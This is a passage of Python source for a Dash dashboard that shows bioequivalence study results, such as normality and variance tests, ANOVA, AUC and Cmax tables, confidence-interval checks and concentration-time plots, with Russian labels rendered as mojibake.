'ะัะฑะพัะบะธ':['ะะตัะฒะฐั ะธ ะฒัะพัะฐั ะณััะฟะฟั',
'ะะตัะธะพะด 1 ะธ ะฟะตัะธะพะด 2', 'ะะตัะฒะฐั ะณััะฟะฟะฐ ัะตััะพะฒัะน ะฟัะตะฟะฐัะฐั', 'ะะตัะฒะฐั ะณััะฟะฟะฐ ัะตัะตัะตะฝัะฝัะน ะฟัะตะฟะฐัะฐั',
'ะัะพัะฐั ะณััะฟะฟะฐ ัะตััะพะฒัะน ะฟัะตะฟะฐัะฐั', 'ะัะพัั ะณััะฟะฟะฐ ัะตัะตัะตะฝัะฝัะน ะฟัะตะฟะฐัะฐั'],
'ะะฝะฐัะตะฝะธะต ะบัะธัะตัะธั':[self.settings[0].bartlett_groups[0],
self.settings[0].bartlett_period[0], self.settings[0].shapiro_t_1[0],
self.settings[0].shapiro_r_1[0], self.settings[0].shapiro_t_2[0], self.settings[0].shapiro_r_2[0]],
'p-ััะพะฒะตะฝั':[self.settings[0].bartlett_groups[1],
self.settings[0].bartlett_period[1], self.settings[0].shapiro_t_1[1],
self.settings[0].shapiro_r_1[1], self.settings[0].shapiro_t_2[1], self.settings[0].shapiro_r_2[1]]}
df = pd.DataFrame(data)
df = round_df(df)
return html.Div([html.Div(html.H1(children='ะัะฟะพะปะฝะตะฝะธะต ะบัะธัะตัะธะตะฒ'),
style={'text-align': 'center'}),
html.Div([
html.Div([
html.Div([dash_table.DataTable(
id='criteria',
columns=[{"name": i, "id": i, "deletable": True}
for i in df.columns],
data=df.to_dict('records'),
style_cell_conditional=[
{'if': {'column_id': 'ะัะธัะตัะธะน'},
'width': '25%'},
{'if': {'column_id': 'ะัะฑะพัะบะธ'},
'width': '25%'},
{'if': {'column_id': 'ะะฝะฐัะตะฝะธะต ะบัะธัะตัะธั'},
'width': '25%'},
{'if': {'column_id': 'p-ััะพะฒะตะฝั'},
'width': '25%'},
],
style_table={'overflowX': 'auto'},
export_format='xlsx'
)], style={'border-color': 'rgb(220, 220, 220)',
'border-style': 'solid', 'padding': '5px', 'margin': '5px'})],
style={'width': '78%', 'display': 'inline-block'}),
html.Div(dcc.Markdown(children=markdown_text_criteria), style={
'width': '18%', 'float': 'right', 'display': 'inline-block'})
])
], style={'margin': '50px'}
)
def _generate_param(self):
data = {'ะััะฟะฟะฐ': ['R', 'T'],
'AUC': [float(np.mean(self.settings[0].auc_r_notlog)),
float(np.mean(self.settings[0].auc_t_notlog))],
'AUC_inf': [float(np.mean(self.settings[0].auc_r_infty)),
float(np.mean(self.settings[0].auc_t_infty))],
'ln AUC': [float(np.mean(self.settings[0].auc_r)), float(np.mean(self.settings[0].auc_t))],
'ln AUC_inf': [float(np.mean(self.settings[0].auc_r_infty_log)),
float(np.mean(self.settings[0].auc_t_infty_log))],
'ln Tmax': [float(np.log(self.settings[0].concentration_r.columns.max())),
float(np.log(self.settings[0].concentration_t.columns.max()))],
'ln Cmax': [float(np.log(self.settings[0].concentration_r.max().max())),
float(np.log(self.settings[0].concentration_t.max().max()))]}
df = pd.DataFrame(data)
df = round_df(df)
return html.Div([html.Div(html.H1(children='ะขะฐะฑะปะธัะฐ ั ัะฐัะฟัะตะดะตะปะตะฝะธะตะผ ะบะปััะตะฒัั
ะฟะฐัะฐะผะตััะพะฒ ะฟะพ ะณััะฟะฟะฐะผ'),
style={'text-align': 'center'}),
html.Div([
html.Div([
html.Div([dash_table.DataTable(
id='param',
columns=[{"name": i, "id": i, "deletable": True}
for i in df.columns],
data=df.to_dict('records'),
style_table={'overflowX': 'auto'},
export_format='xlsx'
)], style={'border-color': 'rgb(220, 220, 220)',
'border-style': 'solid', 'padding': '5px', 'margin': '5px'})],
style={'width': '68%', 'display': 'inline-block'}),
html.Div(dcc.Markdown(children=markdown_text_param),
style={'width': '28%', 'float': 'right', 'display': 'inline-block',
'padding': '5px', 'margin': '5px'})
])
], style={'margin': '50px'}
)
def _generate_log_auc(self):
data = {'ะััะฟะฟะฐ': ['TR', 'RT'],
'ln AUC T': [float(np.mean(self.settings[0].auc_t_1)), float(np.mean(self.settings[0].auc_t_2))],
'ln AUC R': [float(np.mean(self.settings[0].auc_r_1)), float(np.mean(self.settings[0].auc_r_2))]}
df = pd.DataFrame(data)
df = round_df(df)
return html.Div([html.Div(html.H1(children='ะกัะตะดะฝะธะต ะฟะปะพัะฐะดะธ ะฟะพะด ะณัะฐัะธะบะพะผ ะฟะพ ะบะฐะถะดะพะผั ะฟัะตะฟะฐัะฐัั'),
style={'text-align': 'center'}),
html.Div([
html.Div([
html.Div([dash_table.DataTable(
id='param',
columns=[{"name": i, "id": i, "deletable": True}
for i in df.columns],
data=df.to_dict('records'),
style_table={'overflowX': 'auto'},
export_format='xlsx'
)], style={'border-color': 'rgb(220, 220, 220)',
'border-style': 'solid', 'padding': '5px', 'margin': '5px'})],
style={'width': '78%', 'display': 'inline-block'}),
html.Div(dcc.Markdown(children=markdown_text_log_auc), style={
'width': '18%', 'float': 'right', 'display': 'inline-block'})
])
], style={'margin': '50px'}
)
def _generate_anova(self):
if self.settings[0].plan == 'parallel':
df = self.settings[0].anova[0]
mark = markdown_text_anova
heading = 'ะ ะตะทัะปััะฐัั ะบะปะฐััะธัะตัะบะพะณะพ ะดะธัะฟะตััะธะพะฝะฝะพะณะพ ะฐะฝะฐะปะธะทะฐ'
marg = '250px'
else:
df = self.settings[0].anova
mark = markdown_text_anova_cross
heading = 'ะ ะตะทัะปััะฐัั ะดะฒัั
ัะฐะบัะพัะฝะพะณะพ ะดะธัะฟะตััะธะพะฝะฝะพะณะพ ะฐะฝะฐะปะธะทะฐ'
marg = '50px'
df = round_df(df)
return html.Div([html.Div(html.H1(children=heading), style={'text-align': 'center'}),
html.Div([
html.Div([
html.Div([dash_table.DataTable(
id='anova',
columns=[{"name": i, "id": i, "deletable": True}
for i in df.columns],
data=df.to_dict('records'),
style_cell_conditional=[
{'if': {'column_id': 'SS'},
'width': '20%'},
{'if': {'column_id': 'df'},
'width': '20%'},
{'if': {'column_id': 'MS'},
'width': '20%'},
{'if': {'column_id': 'F'},
'width': '20%'},
{'if': {'column_id': 'F ะบัะธั.'},
'width': '20%'}
],
style_table={'overflowX': 'auto'},
export_format='xlsx'
)], style={'border-color': 'rgb(220, 220, 220)',
'border-style': 'solid', 'padding': '5px', 'margin': '5px'})],
style={'width': '78%', 'display': 'inline-block'}),
html.Div(dcc.Markdown(children=mark), style={
'width': '18%', 'float': 'right', 'display': 'inline-block'})
])
], style={'margin': '50px', 'margin-top': marg}
)
def _generate_interval(self):
data = {'ะัะธัะตัะธะน': ['ะะธะพัะบะฒะธะฒะฐะปะตะฝัะฝะพััะธ', 'ะะธะพะฝะตัะบะฒะธะฒะฐะปะตะฝัะฝะพััะธ'],
'ะะธะถะฝัั ะณัะฐะฝะธัะฐ': [100 * (e**self.settings[0].oneside_eq[0]), 100 * (e**self.settings[0].oneside_noteq[0])],
'ะะตัั
ะฝัั ะณัะฐะฝะธัะฐ': [100 * (e**self.settings[0].oneside_eq[1]), 100 * (e**self.settings[0].oneside_noteq[1])],
'ะะพะฒะตัะธัะตะปัะฝัะน ะธะฝัะตัะฒะฐะป ะบัะธัะตัะธั': ['80.00-125.00%', '80.00-125.00%'],
'ะัะฟะพะปะฝะตะฝะธะต ะบัะธัะตัะธั': ['ะัะฟะพะปะฝะตะฝ' if (self.settings[0].oneside_eq[0] > -0.223 and
self.settings[0].oneside_eq[1] < 0.223) else 'ะะต ะฒัะฟะพะปะฝะตะฝ',
'ะัะฟะพะปะฝะตะฝ' if (self.settings[0].oneside_noteq[0] > 0.223 or
self.settings[0].oneside_noteq[1] < -0.223) else 'ะะต ะฒัะฟะพะปะฝะตะฝ']}
df = pd.DataFrame(data)
df = round_df(df)
return html.Div([html.Div(html.H1(children='ะ ะตะทัะปััะฐัั ะพัะตะฝะบะธ ะฑะธะพัะบะฒะธะฒะฐะปะตะฝัะฝะพััะธ'),
style={'text-align': 'center'}),
html.Div([
html.Div([
html.Div([dash_table.DataTable(
id='interval',
columns=[{"name": i, "id": i, "deletable": True}
for i in df.columns],
data=df.to_dict('records'),
style_table={'overflowX': 'auto'},
export_format='xlsx'
)], style={'border-color': 'rgb(220, 220, 220)',
'border-style': 'solid', 'padding': '5px', 'margin': '5px'})],
style={'width': '78%', 'display': 'inline-block'}),
html.Div(dcc.Markdown(children=markdown_text_interval), style={
'width': '18%', 'float': 'right', 'display': 'inline-block'})
])
], style={'margin': '50px', 'margin-top': '150px'}
)
def _generate_concentration_time(self, ref=True):
if ref:
df = self.settings[0].concentration_r
time = df.columns
def update_graph(yaxis_column_name_conc_r):
fig = go.Figure()
fig.add_trace(go.Scatter(x=time, y=df.loc[
yaxis_column_name_conc_r], name='ะัะฐัะธะบ'))
fig.add_trace(go.Scatter(x=[time[np.argmax(df.loc[
yaxis_column_name_conc_r])]], y = [max(df.loc[
yaxis_column_name_conc_r])], mode='markers', name='ะะฐะบัะธะผัะผ',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df.loc[
yaxis_column_name_conc_r])]], y = [min(df.loc[
yaxis_column_name_conc_r])], mode='markers', name='ะะธะฝะธะผัะผ',
marker=dict(size = 15, color = 'green')))
fig.update_xaxes(title='ะัะตะผั')
fig.update_yaxes(title=yaxis_column_name_conc_r,
type='linear')
return fig
self.app.callback(dash.dependencies.Output('concentration_time_r', 'figure'),
[dash.dependencies.Input('yaxis_column_name_conc_r', 'value')])(update_graph)
available_indicators = df.index
return html.Div([html.Div(html.H1(children='ะัะฐัะธะบ ะทะฐะฒะธัะธะผะพััะธ ะบะพะฝัะตะฝััะฐัะธะธ ะพั ะฒัะตะผะตะฝะธ ะณััะฟะฟะฐ ัะตัะตัะตะฝัะฝะพะณะพ ะฟัะตะฟะฐัะฐัะฐ'),
style={'text-align': 'center'}),
html.Div([
html.Div([
html.Div([
dcc.Markdown(
children="ะัะฑะตัะธัะต ะฟะพะบะฐะทะฐัะตะปั ะดะปั ะพัะธ ะY:"),
dcc.Dropdown(
id='yaxis_column_name_conc_r',
options=[{'label': i, 'value': i}
for i in available_indicators],
value=available_indicators[0]
)
], style={'width': '48%', 'display': 'inline-block'}),
], style={'padding': '5px'}),
dcc.Graph(id='concentration_time_r')], style={'width': '78%',
'display': 'inline-block', 'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
html.Div(dcc.Markdown(children=markdown_text_conc_time_r),
style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
style={'margin': '100px'}
)
else:
df = self.settings[0].concentration_t
time = df.columns
def update_graph(yaxis_column_name_conc_t):
fig = go.Figure()
fig.add_trace(go.Scatter(x=time, y=df.loc[
yaxis_column_name_conc_t], name='ะัะฐัะธะบ'))
fig.add_trace(go.Scatter(x=[time[np.argmax(df.loc[
yaxis_column_name_conc_t])]], y = [max(df.loc[
yaxis_column_name_conc_t])], mode='markers', name='ะะฐะบัะธะผัะผ',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df.loc[
yaxis_column_name_conc_t])]], y = [min(df.loc[
yaxis_column_name_conc_t])], mode='markers', name='ะะธะฝะธะผัะผ',
marker=dict(size = 15, color = 'green')))
fig.update_xaxes(title='ะัะตะผั')
fig.update_yaxes(title=yaxis_column_name_conc_t,
type='linear')
return fig
self.app.callback(dash.dependencies.Output('concentration_time_t', 'figure'),
[dash.dependencies.Input('yaxis_column_name_conc_t', 'value')])(update_graph)
available_indicators = df.index
return html.Div([html.Div(html.H1(children='ะัะฐัะธะบ ะทะฐะฒะธัะธะผะพััะธ ะบะพะฝัะตะฝััะฐัะธะธ ะพั ะฒัะตะผะตะฝะธ ะณััะฟะฟะฐ ัะตััะพะฒะพะณะพ ะฟัะตะฟะฐัะฐัะฐ'),
style={'text-align': 'center'}),
html.Div([
html.Div([
html.Div([
dcc.Markdown(
children="ะัะฑะตัะธัะต ะฟะพะบะฐะทะฐัะตะปั ะดะปั ะพัะธ ะY:"),
dcc.Dropdown(
id='yaxis_column_name_conc_t',
options=[{'label': i, 'value': i}
for i in available_indicators],
value=available_indicators[0]
)
], style={'width': '48%', 'display': 'inline-block'}),
], style={'padding': '5px'}),
dcc.Graph(id='concentration_time_t')], style={'width': '78%',
'display': 'inline-block', 'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
html.Div(dcc.Markdown(children=markdown_text_conc_time_t),
style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
style={'margin': '100px'}
)
def _generate_concentration_time_log(self, ref=True):
if ref:
df = self.settings[0].concentration_r
time = df.columns
def update_graph(yaxis_column_name_conc_r_log):
fig = go.Figure()
fig.add_trace(go.Scatter(x=time, y=df.loc[
yaxis_column_name_conc_r_log], name='ะัะฐัะธะบ'))
fig.add_trace(go.Scatter(x=[time[np.argmax(df.loc[
yaxis_column_name_conc_r_log])]], y = [max(df.loc[
yaxis_column_name_conc_r_log])], mode='markers', name='ะะฐะบัะธะผัะผ',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df.loc[
yaxis_column_name_conc_r_log])]], y = [min(df.loc[
yaxis_column_name_conc_r_log])], mode='markers', name='ะะธะฝะธะผัะผ',
marker=dict(size = 15, color = 'green')))
fig.update_xaxes(title='ะัะตะผั')
fig.update_yaxes(title=yaxis_column_name_conc_r_log,
type='log')
return fig
self.app.callback(dash.dependencies.Output('concentration_time_r_log', 'figure'),
[dash.dependencies.Input('yaxis_column_name_conc_r_log', 'value')])(update_graph)
available_indicators = df.index
return html.Div([html.Div(html.H1(children='ะัะฐัะธะบ ะทะฐะฒะธัะธะผะพััะธ ะฟัะพะปะพะณะฐัะธัะผะธัะพะฒะฐะฝะฝะพะน ะบะพะฝัะตะฝััะฐัะธะธ ะพั ะฒัะตะผะตะฝะธ ะณััะฟะฟะฐ ัะตัะตัะตะฝัะฝะพะณะพ ะฟัะตะฟะฐัะฐัะฐ'),
style={'text-align': 'center'}),
html.Div([
html.Div([
html.Div([
dcc.Markdown(
children="ะัะฑะตัะธัะต ะฟะพะบะฐะทะฐัะตะปั ะดะปั ะพัะธ ะY:"),
dcc.Dropdown(
id='yaxis_column_name_conc_r_log',
options=[{'label': i, 'value': i}
for i in available_indicators],
value=available_indicators[0]
)
], style={'width': '48%', 'display': 'inline-block'}),
], style={'padding': '5px'}),
dcc.Graph(id='concentration_time_r_log')], style={'width': '78%',
'display': 'inline-block', 'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
html.Div(dcc.Markdown(children=markdown_text_conc_time_r_log),
style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
style={'margin': '100px'}
)
else:
df = self.settings[0].concentration_t
time = df.columns
def update_graph(yaxis_column_name_conc_t_log):
fig = go.Figure()
fig.add_trace(go.Scatter(x=time, y=df.loc[
yaxis_column_name_conc_t_log], name='ะัะฐัะธะบ'))
fig.add_trace(go.Scatter(x=[time[np.argmax(df.loc[
yaxis_column_name_conc_t_log])]], y = [max(df.loc[
yaxis_column_name_conc_t_log])], mode='markers', name='ะะฐะบัะธะผัะผ',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df.loc[
yaxis_column_name_conc_t_log])]], y = [min(df.loc[
yaxis_column_name_conc_t_log])], mode='markers', name='ะะธะฝะธะผัะผ',
marker=dict(size = 15, color = 'green')))
fig.update_xaxes(title='ะัะตะผั')
fig.update_yaxes(title=yaxis_column_name_conc_t_log,
type='log')
return fig
self.app.callback(dash.dependencies.Output('concentration_time_t_log', 'figure'),
[dash.dependencies.Input('yaxis_column_name_conc_t_log', 'value')])(update_graph)
available_indicators = df.index
return html.Div([html.Div(html.H1(children='ะัะฐัะธะบ ะทะฐะฒะธัะธะผะพััะธ ะฟัะพะปะพะณะฐัะธัะผะธัะพะฒะฐะฝะฝะพะน ะบะพะฝัะตะฝััะฐัะธะธ ะพั ะฒัะตะผะตะฝะธ ะณััะฟะฟะฐ ัะตััะพะฒะพะณะพ ะฟัะตะฟะฐัะฐัะฐ'),
style={'text-align': 'center'}),
html.Div([
html.Div([
html.Div([
dcc.Markdown(
children="ะัะฑะตัะธัะต ะฟะพะบะฐะทะฐัะตะปั ะดะปั ะพัะธ ะY:"),
dcc.Dropdown(
id='yaxis_column_name_conc_t_log',
options=[{'label': i, 'value': i}
for i in available_indicators],
value=available_indicators[0]
)
], style={'width': '48%', 'display': 'inline-block'}),
], style={'padding': '5px'}),
dcc.Graph(id='concentration_time_t_log')], style={'width': '78%',
'display': 'inline-block', 'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
html.Div(dcc.Markdown(children=markdown_text_conc_time_t_log),
style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
style={'margin': '100px'}
)
def _generate_concentration_time_linlog(self, ref=True):
if ref:
df = self.settings[0].concentration_r
time = df.columns
def update_graph(yaxis_column_name_conc_r_linlog, yaxis_type_conc_r_linlog):
fig = go.Figure()
fig.add_trace(go.Scatter(x=time, y=df.loc[
yaxis_column_name_conc_r_linlog], name='ะัะฐัะธะบ'))
fig.add_trace(go.Scatter(x=[time[np.argmax(df.loc[
yaxis_column_name_conc_r_linlog])]], y = [max(df.loc[
yaxis_column_name_conc_r_linlog])], mode='markers', name='ะะฐะบัะธะผัะผ',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df.loc[
yaxis_column_name_conc_r_linlog])]], y = [min(df.loc[
yaxis_column_name_conc_r_linlog])], mode='markers', name='ะะธะฝะธะผัะผ',
marker=dict(size = 15, color = 'green')))
fig.update_xaxes(title='ะัะตะผั')
fig.update_yaxes(title=yaxis_column_name_conc_r_linlog,
type=yaxis_type_conc_r_linlog)
return fig
self.app.callback(dash.dependencies.Output('concentration_time_r_linlog', 'figure'),
[dash.dependencies.Input('yaxis_column_name_conc_r_linlog', 'value'),
dash.dependencies.Input('yaxis_type_conc_r_linlog', 'value')])(update_graph)
available_indicators = df.index
return html.Div([html.Div(html.H1(children='ะัะฐัะธะบ ะทะฐะฒะธัะธะผะพััะธ ะบะพะฝัะตะฝััะฐัะธะธ ะพั ะฒัะตะผะตะฝะธ ะณััะฟะฟะฐ ัะตัะตัะตะฝัะฝะพะณะพ ะฟัะตะฟะฐัะฐัะฐ'),
style={'text-align': 'center'}),
html.Div([
html.Div([
html.Div([
dcc.Markdown(
children="ะัะฑะตัะธัะต ะฟะพะบะฐะทะฐัะตะปั ะดะปั ะพัะธ ะY:"),
dcc.Dropdown(
id='yaxis_column_name_conc_r_linlog',
options=[{'label': i, 'value': i}
for i in available_indicators],
value=available_indicators[0]
)
], style={'width': '48%', 'display': 'inline-block'}),
html.Div([dcc.RadioItems(
id='yaxis_type_conc_r_linlog',
options=[{'label': i, 'value': i}
for i in ['linear', 'log']],
value='linear'
)], style={'width': '48%', 'display': 'inline-block', 'float': 'right'})
], style={'padding': '5px'}),
dcc.Graph(id='concentration_time_r_linlog')], style={'width': '78%',
'display': 'inline-block', 'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
html.Div(dcc.Markdown(children=markdown_text_conc_time_r),
style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
style={'margin': '100px'}
)
else:
df = self.settings[0].concentration_t
time = df.columns
def update_graph(yaxis_column_name_conc_t_linlog, yaxis_type_conc_t_linlog):
fig = go.Figure()
fig.add_trace(go.Scatter(x=time, y=df.loc[
yaxis_column_name_conc_t_linlog], name='ะัะฐัะธะบ'))
fig.add_trace(go.Scatter(x=[time[np.argmax(df.loc[
yaxis_column_name_conc_t_linlog])]], y = [max(df.loc[
yaxis_column_name_conc_t_linlog])], mode='markers', name='ะะฐะบัะธะผัะผ',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df.loc[
yaxis_column_name_conc_t_linlog])]], y = [min(df.loc[
yaxis_column_name_conc_t_linlog])], mode='markers', name='ะะธะฝะธะผัะผ',
marker=dict(size = 15, color = 'green')))
fig.update_xaxes(title='ะัะตะผั')
fig.update_yaxes(title=yaxis_column_name_conc_t_linlog,
type=yaxis_type_conc_t_linlog)
return fig
self.app.callback(dash.dependencies.Output('concentration_time_t_linlog', 'figure'),
[dash.dependencies.Input('yaxis_column_name_conc_t_linlog', 'value'),
dash.dependencies.Input('yaxis_type_conc_t_linlog', 'value')])(update_graph)
available_indicators = df.index
return html.Div([html.Div(html.H1(children='ะัะฐัะธะบ ะทะฐะฒะธัะธะผะพััะธ ะบะพะฝัะตะฝััะฐัะธะธ ะพั ะฒัะตะผะตะฝะธ ะณััะฟะฟะฐ ัะตััะพะฒะพะณะพ ะฟัะตะฟะฐัะฐัะฐ'),
style={'text-align': 'center'}),
html.Div([
html.Div([
html.Div([
dcc.Markdown(
children="ะัะฑะตัะธัะต ะฟะพะบะฐะทะฐัะตะปั ะดะปั ะพัะธ ะY:"),
dcc.Dropdown(
id='yaxis_column_name_conc_t_linlog',
options=[{'label': i, 'value': i}
for i in available_indicators],
value=available_indicators[0]
)
], style={'width': '48%', 'display': 'inline-block'}),
html.Div([dcc.RadioItems(
id='yaxis_type_conc_t_linlog',
options=[{'label': i, 'value': i}
for i in ['linear', 'log']],
value='linear'
)], style={'width': '48%', 'display': 'inline-block', 'float': 'right'})
], style={'padding': '5px'}),
dcc.Graph(id='concentration_time_t_linlog')], style={'width': '78%',
'display': 'inline-block', 'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
html.Div(dcc.Markdown(children=markdown_text_conc_time_t),
style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
style={'margin': '100px'}
)
def _generate_concentration_time_cross(self, tr=True):
if tr:
df_t = self.settings[0].concentration_t_1
df_r = self.settings[0].concentration_r_1
time = df_t.columns
def update_graph(yaxis_column_name_conc_tr, yaxis_type_conc_tr):
fig = go.Figure()
fig.add_trace(go.Scatter(x=time, y=df_t.loc[
yaxis_column_name_conc_tr], name='T'))
fig.add_trace(go.Scatter(x=time, y=df_r.loc[
yaxis_column_name_conc_tr], name='R'))
fig.add_trace(go.Scatter(x=[time[np.argmax(df_t.loc[
yaxis_column_name_conc_tr])]], y = [max(df_t.loc[
yaxis_column_name_conc_tr])], mode='markers', name='ะะฐะบัะธะผัะผ T',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df_t.loc[
yaxis_column_name_conc_tr])]], y = [min(df_t.loc[
yaxis_column_name_conc_tr])], mode='markers', name='ะะธะฝะธะผัะผ T',
marker=dict(size = 15, color = 'green')))
fig.add_trace(go.Scatter(x=[time[np.argmax(df_r.loc[
yaxis_column_name_conc_tr])]], y = [max(df_r.loc[
yaxis_column_name_conc_tr])], mode='markers', name='ะะฐะบัะธะผัะผ R',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df_r.loc[
yaxis_column_name_conc_tr])]], y = [min(df_r.loc[
yaxis_column_name_conc_tr])], mode='markers', name='ะะธะฝะธะผัะผ R',
marker=dict(size = 15, color = 'green')))
fig.update_xaxes(title='ะัะตะผั')
fig.update_yaxes(title=yaxis_column_name_conc_tr,
type=yaxis_type_conc_tr)
return fig
self.app.callback(dash.dependencies.Output('concentration_time_tr', 'figure'),
[dash.dependencies.Input('yaxis_column_name_conc_tr', 'value'),
dash.dependencies.Input('yaxis_type_conc_tr', 'value')])(update_graph)
available_indicators = df_t.index
return html.Div([html.Div(html.H1(children='ะะฝะดะธะฒะธะดัะฐะปัะฝัะต ะณัะฐัะธะบะธ ะบะพะฝัะตะฝััะฐัะธะธ ะดะปั ะฟะฐัะธะตะฝัะพะฒ ะณััะฟะฟะฐ TR'),
style={'text-align': 'center'}),
html.Div([
html.Div([
html.Div([
dcc.Markdown(
children="ะัะฑะตัะธัะต ะฟะพะบะฐะทะฐัะตะปั ะดะปั ะพัะธ ะY:"),
dcc.Dropdown(
id='yaxis_column_name_conc_tr',
options=[{'label': i, 'value': i}
for i in available_indicators],
value=available_indicators[0]
)
], style={'width': '48%', 'display': 'inline-block'}),
html.Div([dcc.RadioItems(
id='yaxis_type_conc_tr',
options=[{'label': i, 'value': i}
for i in ['linear', 'log']],
value='linear'
)], style={'width': '48%', 'float': 'right', 'display': 'inline-block'})
], style={'padding': '5px'}),
dcc.Graph(id='concentration_time_tr')], style={'width': '78%',
'display': 'inline-block', 'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
html.Div(dcc.Markdown(children=markdown_concentration_time_cross_tr),
style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
style={'margin': '100px'}
)
else:
df_t = self.settings[0].concentration_t_2
df_r = self.settings[0].concentration_r_2
time = df_t.columns
def update_graph(yaxis_column_name_conc_rt, yaxis_type_conc_rt):
fig = go.Figure()
fig.add_trace(go.Scatter(x=time, y=df_t.loc[
yaxis_column_name_conc_rt], name='T'))
fig.add_trace(go.Scatter(x=time, y=df_r.loc[
yaxis_column_name_conc_rt], name='R'))
fig.add_trace(go.Scatter(x=[time[np.argmax(df_t.loc[
yaxis_column_name_conc_rt])]], y = [max(df_t.loc[
yaxis_column_name_conc_rt])], mode='markers', name='ะะฐะบัะธะผัะผ T',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df_t.loc[
yaxis_column_name_conc_rt])]], y = [min(df_t.loc[
yaxis_column_name_conc_rt])], mode='markers', name='ะะธะฝะธะผัะผ T',
marker=dict(size = 15, color = 'green')))
fig.add_trace(go.Scatter(x=[time[np.argmax(df_r.loc[
yaxis_column_name_conc_rt])]], y = [max(df_r.loc[
yaxis_column_name_conc_rt])], mode='markers', name='ะะฐะบัะธะผัะผ R',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df_r.loc[
yaxis_column_name_conc_rt])]], y = [min(df_r.loc[
yaxis_column_name_conc_rt])], mode='markers', name='ะะธะฝะธะผัะผ R',
marker=dict(size = 15, color = 'green')))
fig.update_xaxes(title='ะัะตะผั')
fig.update_yaxes(title=yaxis_column_name_conc_rt,
type=yaxis_type_conc_rt)
return fig
self.app.callback(dash.dependencies.Output('concentration_time_rt', 'figure'),
[dash.dependencies.Input('yaxis_column_name_conc_rt', 'value'),
dash.dependencies.Input('yaxis_type_conc_rt', 'value')])(update_graph)
available_indicators = df_t.index
return html.Div([html.Div(html.H1(children='ะะฝะดะธะฒะธะดัะฐะปัะฝัะต ะณัะฐัะธะบะธ ะบะพะฝัะตะฝััะฐัะธะธ ะดะปั ะฟะฐัะธะตะฝัะพะฒ ะณััะฟะฟะฐ RT'),
style={'text-align': 'center'}),
html.Div([
html.Div([
html.Div([
dcc.Markdown(
children="ะัะฑะตัะธัะต ะฟะพะบะฐะทะฐัะตะปั ะดะปั ะพัะธ ะY:"),
dcc.Dropdown(
id='yaxis_column_name_conc_rt',
options=[{'label': i, 'value': i}
for i in available_indicators],
value=available_indicators[0]
)
], style={'width': '48%', 'display': 'inline-block'}),
html.Div([dcc.RadioItems(
id='yaxis_type_conc_rt',
options=[{'label': i, 'value': i}
for i in ['linear', 'log']],
value='linear'
)], style={'width': '48%', 'float': 'right', 'display': 'inline-block'})
], style={'padding': '5px'}),
dcc.Graph(id='concentration_time_rt')], style={'width': '78%',
'display': 'inline-block', 'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
html.Div(dcc.Markdown(children=markdown_concentration_time_cross_rt),
style={'width': '18%', 'float': 'right', 'display': 'inline-block'})],
style={'margin': '100px'}
)
def _generate_concentration_time_mean(self):
df_r = self.settings[0].concentration_r.mean()
df_t = self.settings[0].concentration_t.mean()
time = df_t.index
fig = go.Figure()
fig.add_trace(go.Scatter(x=time, y=df_r, name='R'))
fig.add_trace(go.Scatter(x=time, y=df_t, name='T'))
fig.add_trace(go.Scatter(x=[time[np.argmax(df_t)]], y = [max(df_t)], mode='markers', name='ะะฐะบัะธะผัะผ T',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df_t)]], y = [min(df_t)], mode='markers', name='ะะธะฝะธะผัะผ T',
marker=dict(size = 15, color = 'green')))
fig.add_trace(go.Scatter(x=[time[np.argmax(df_r)]], y = [max(df_r)], mode='markers', name='ะะฐะบัะธะผัะผ R',
marker=dict(size = 15, color = 'violet')))
fig.add_trace(go.Scatter(x=[time[np.argmin(df_r)]], y = [min(df_r)], mode='markers', name='ะะธะฝะธะผัะผ R',
marker=dict(size = 15, color = 'green')))
fig.update_xaxes(title='ะัะตะผั')
fig.update_yaxes(title='ะะพะฝัะตะฝััะฐัะธั',
type='linear')
return html.Div([html.Div(html.H1(children='ะะฑะพะฑัะตะฝะฝัะน ะณัะฐัะธะบ ะทะฐะฒะธัะธะผะพััะธ ะบะพะฝัะตะฝััะฐัะธะธ ะพั ะฒัะตะผะตะฝะธ'),
style={'text-align': 'center'}),
html.Div([
dcc.Graph(id='concentration_time_mean', figure=fig)],
style={'width': '78%', 'display': 'inline-block',
'border-color': 'rgb(220, 220, 220)', 'border-style': 'solid', 'padding': '5px'}),
html.Div(dcc.Markdown(children=markdown_text_conc_time_mean),
style={'width': '18%', 'float': 'right', 'display': 'inline-block'})], style={'margin': '100px'}
)
def _generate_concentration_time_log_mean(self):
df_r = self.settings[0].concentration_r.mean()
df_t = self.settings[0].concentration_t.mean()
time = df_t.index
fig = go.Figure()
fig.add_trace(go.Scatter(x=time, y=df_r, name='R'))
fig.add_trace(go.Scatter(x=time, y=df_t, name='T'))
